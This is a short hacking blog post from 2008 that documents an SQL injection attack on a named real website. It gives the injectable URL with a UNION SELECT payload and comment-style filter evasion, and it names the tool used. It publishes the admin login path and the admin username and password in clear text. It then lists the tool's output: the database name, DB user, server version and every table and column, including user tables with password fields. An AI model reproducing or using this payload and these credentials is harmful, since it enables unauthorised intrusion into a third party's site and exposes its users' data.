viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Thursday, October 9, 2008

[SQLi] http://www.dewanstudio.com

11:47 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5
Admin dir --> http://www.dewanstudio.com/admin/
Admin usr:pwd --> admin:dewans29
Dump:
[+] URL:http://www.dewanstudio.com/?op=6&s_id=2&c_id=69'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8,9,10,11/*
[+] Evasion Used: "/**/" "/*"
[+] 17:56:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ds_dewanstudio
User: dewan_ds@localhost
Version: 5.0.21-community-nt

[Database]: ds_dewanstudio
[Table: Columns]
[0]banned_ip: ip_id,ip_banned,ip_desc
[1]client: id,rname,username,password,email,telp,address,gambar,texp,last,act,ip,ol
[2]comment: id,c_id,nama,email,judul,isi
[3]content: c_id,k_id,s_id,c_judul,c_isi,c_img,c_thumb,c_link,c_edit,c_waktu,c_ip,c_publish
[4]content_cat: id,judul,list_order
[5]image_client: id,u_id,img_id
[6]image_item: id,par_id,judul,gambar,baru,upost,wpost,ippost,uedit,wedit,ipedit
[7]image_location: id,l_id,name,l_desc,img,thumb
[8]images: img_id,img_name
[9]kategori: k_id,s_id,k_name,k_port
[10]location: id,par_id,judul,isi
[11]polling: p_id,k_id,p_judul,p_pilihan,p_jawaban,p_ord,p_publish
[12]seksi: s_id,s_name,s_thumb,s_color
[13]site: site_id,title,footer,email_contact,site_url,img_url,img_dir,paging_cms,paging_produk,paging_bukutamu,desc_contact
[14]users: u_id,u_rname,u_name,u_pass,u_level,u_mail,u_img,u_act,u_last,u_ip,u_ol

[-] [17:58:18]
[-] Total URL Requests 104
[-] Done

0 comments:

Post a Comment